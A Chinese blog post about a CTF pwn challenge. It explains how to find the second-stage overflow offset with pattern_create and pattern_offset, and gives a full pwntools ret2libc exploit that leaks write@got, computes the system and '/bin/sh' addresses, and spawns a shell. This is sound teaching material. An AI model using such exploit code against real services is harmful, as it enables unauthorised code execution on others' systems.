多次溢出payload偏移量计算

最新推荐文章于 2021-12-26 23:06:47 发布
最新推荐文章于 2021-12-26 23:06:47 发布
阅读量796 收藏
点赞数 1
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liminglei960316/article/details/81142064
版权

第二次payload,定位经常和第一次不一样导致漏洞利用不成功。

一直都是手工分析,有些很难发现的原因导致一直分析不出来,还很浪费时间。

最后总结了一种用脚本判断第二次payload地址的方法。

核心代码:

p=process()

context.log_level = 'debug'

gdb.attach(p)

payload1=.......

......

payload2="一串字符串"+返回地址+函数参数1+2+3+。。。。。(一串字符串用pattern_create生成)

在attach中会报错,用patter_offset计算偏移,得到第二次的溢出位置

 

 

from pwn import *

local = True
log = True

if local:
    io = process('./pwnme')
else :
    io = remote('ip' , 'port')

context.log_level = 'debug'

 

write_got = 0x804A01c
main = 0x804847D
write_plt = 0x8048370

payload1 = 'a'*20+ p32(write_plt) + p32(main) + p32(1) + p32(write_got) + p32(4)


io.recvuntil('the flag:\n')

#gdb.attach(io)

io.sendline(payload1)
libc  =  ELF('./libc.so.6')


write_got_addr = u32(io.recv(4))

print hex(write_got_addr)

system_add = write_got_addr -  libc.symbols['write'] + libc.symbols['system']

print hex(system_add)


binsh_add  = write_got_addr - libc.symbols['write'] + next(libc.search('/bin/sh'))
print "binshadd:" +hex(binsh_add)
payload2 = 'a'*20+ p32(system_add) + p32(0) + p32(binsh_add)


io.sendline(payload2)
io.interactive()

 

 

liminglei960316
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-Web-XSS
beihai2013
02-03 735
XSS靶机 level1 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> ## 若执行了alert,则执行以下语句 window.alert = function() { confirm("完成的不错!"); window.loc
PWN:栈溢出----偏移的计算
m0_53932372的博客
08-03 1998
就目前遇到的栈溢出题目而言,使用ida就可以完成便宜的计算。 这些栈溢出题目,基本上不需要调试,ida本身提供的栈空间数据就可以实现偏移的计算。 BUUCTF:bjdctf_2020_babystack2 这道题目,我们看ida: 具体做法不细说,主要看偏移: buf和nbyte 看栈空间: 下方没有s只有r,而r就是返回地址 给了后门函数,那就利用read函数,达到缓冲区溢出的目的。 +0x8-(-0x10)=0x18=24 偏移就是二十四。 以上只是本人拙见,栈溢出偏移困扰了我很久,希望这次不会
PWN学习总结
windy_ll的博客
12-26 1770
一、栈溢出原理     什么是栈溢出?栈溢出就是缓冲区溢出的一种。 由于缓冲区溢出而使得有用的存储单元被改写,往往会引发不可预料的后果。程序在运行过程中,为了临时存取数据的需要,一般都要分配一些内存空间,通常称这些空间为缓冲区。如果向缓冲区中写入超过其本身长度的数据,以致于缓冲区无法容纳,就会造成缓冲区以外的存储单元被改写,这种现象就称为缓冲区溢出。缓冲区长度一般与用户自己定义的缓冲变量的类型有关。(PS:摘自百度百科)     简单来说,就是程序没有检查用户输入的数据长度,导致攻击者覆盖栈上不是程序希望写
ctf 反序列化字符逃逸
giaogiao123的博客
12-17 914
第一种,关键词过滤,变多的 比如0ctf :piapiapia 我先说一次什么是反序列化字符逃逸。 <?php class user{ public $user = 'admin'; public $pass = 'passwd'; } $a = new user(); $b = serialize($a); echo $b."<br>";
pwn 学习笔记 格式化串计算偏移量
SsMing的博客
08-15 4843
学习参照:https://ctf-wiki.github.io/ctf-wiki/pwn/fmtstr/fmtstr_exploit/ 利用%s泄露libc函数的got表内容 addr%k$s可以用来泄露指定地址的内容,但要先确定k的值,可控制的格式化字符串参数是函数第几个参数(k+1),减一就是格式化字符串的第几个参数(k)。 利用  [tag]%p%p%p%p%p%p%p%p%p%p来确...
payload-dumper-解包
03-22
在IT行业中,"payload-dumper-解包"这个主题涉及到的是对特定文件格式的解析,尤其是针对payload.bin文件。Payload.bin通常是一种二进制文件,它可能包含各种系统数据、固件更新或者其他形式的执行代码,用于在目标...
一次溢出攻击的体验
02-07
溢出攻击是一种利用程序设计中的缓冲区溢出漏洞进行攻击的技术。在本案例中,作者以二进制新手的角度,通过实际操作展示了如何对一个名为 freefloatftpserver1.0 的漏洞软件进行溢出攻击。攻击的目标是覆盖函数返回...
发那科机器人payload.ppt
07-04
发那科机器人payload.ppt
payload.bin格式解压程序.rar
04-02
在IT领域,payload通常指的是一个数据包或一段代码,它承载...总的来说,payload.bin格式的解压涉及了二进制文件处理、数据解码、程序执行和安全实践等多个IT领域的知识点,需要具备相应的技术和安全意识才能正确操作。
Payload_Dumber_x64.zip
07-04
Payload_Dumber_x64.zip是一个针对一加手机的刷机包工具,主要包含了解包工具payload_dumper.exe,以及相关的输入输出文件payload_input和payload_output,还有Readme.txt说明文件。这个工具主要用于处理一加手机的...
偏移注入payload构造技巧实战+Access注入
CClarence的专栏
11-06 5553
url:http://218.245.4.113:8888/web03/ca55022fa7ae5c29d179041883fe1556/index.asp?id=886 拿到url,虽然知道肯定是id是注入点,但还是写一下完整思路: 1.拿到界面,长这样 2.先判断是否有sql注入,注入点,886后加’,发现报错,证明有注入 猜测数据库表并验证,方法是url后加 and (sele
wireshark- 计算数据(tcp payload)长度
qq_28808697的博客
07-13 9511
从IP包可以看出,IP包的长度是42,IP首部长度是20,那么TCP包的长度= IP包的长度 - IP首部长度 = 42- 20 = 22 从TCP包可以看出,TCP首部的长度是20字节, 那么 数据长度 = TCP包长度 - TCP首部长度 = 22 - 20 = 2 ...
c++堆栈溢出怎么解决_栈溢出基础
weixin_39610422的博客
11-23 3323
一. 基础知识什么是缓冲区溢出在深入探讨技术之前, 让我们先了解一下缓冲区溢出的实际内容.想象一个非常简单的程序, 要求你输入你的用户名, 然后返回到它在做什么.从视觉上看, 如下所示注意到括号之间的空格是输入用户名的预期空间.那个空间是我们的缓冲.处理用户名后, 返回地址将告知程序需要执行的下一个指令.现在, 如果我们不仅输入用户名, 而且添加其他数据以溢出此缓冲区空间, 会发生什么情况?不仅如...
溢出利用之return to dl-resolve payload 构造原理(一)
M021的专栏
11-02 3310
前段时间,学习了return to dl-resolve 方法,并且分别在32位应用和64位应用上实践了一番,现记录下我的学习心得。
payload 是什么意思
weixin_33924220的博客
10-08 3019
为什么80%的码农都做不了架构师?>>> ...
PWN学习,对CTF-wiki上的讲解进行一些补充
qq_33948522的博客
06-27 5535
`基本知识 ROP Return Oriented Programming,其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 一般的栈结构: 高地址 +-----------------+ ...
udp协议的数据接收与发送的代码 分类: VC++ ...
weixin_30374009的博客
02-25 275
我想基于lwIP协议中的UDP协议,用单片机做一个服务器,接受电脑的指令然后返回数据。以下是我的代码 /**************************************************** *函数功能:初始化udp,选定通信端口,建立连接机制 ****************************************************/ v...
jarvis oj level3/level4--多种解法实现ret2libc
超人学飞的日子
04-09 773
level3和level4都是ret2libc的典型题目,只不过level3给了libc文件而level4没有给。 这里以leve3为例,使用多种方式实现ret2libc 一,使用给定的libc文件,计算偏移地址 整体思路就是通过首先泄露处libc中某个函数运行时的实际地址,再通过给定的libc文件计算出system函数的实际地址,跳转到system函数执行 基础原理:http://ww...
XSS常用payload整理(持续更新)
纸房子
12-13 6123
XSS常用payload
格式化字符串漏洞怎么测试偏移量
最新发布
05-11
格式化字符串漏洞的测试过程中,需要先通过输入特定的格式字符串来泄露栈上的数据,然后再计算偏移量。以下是一个示例: 假设有以下代码: ```c #include int main(int argc, char **argv) { char buf[100]; ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值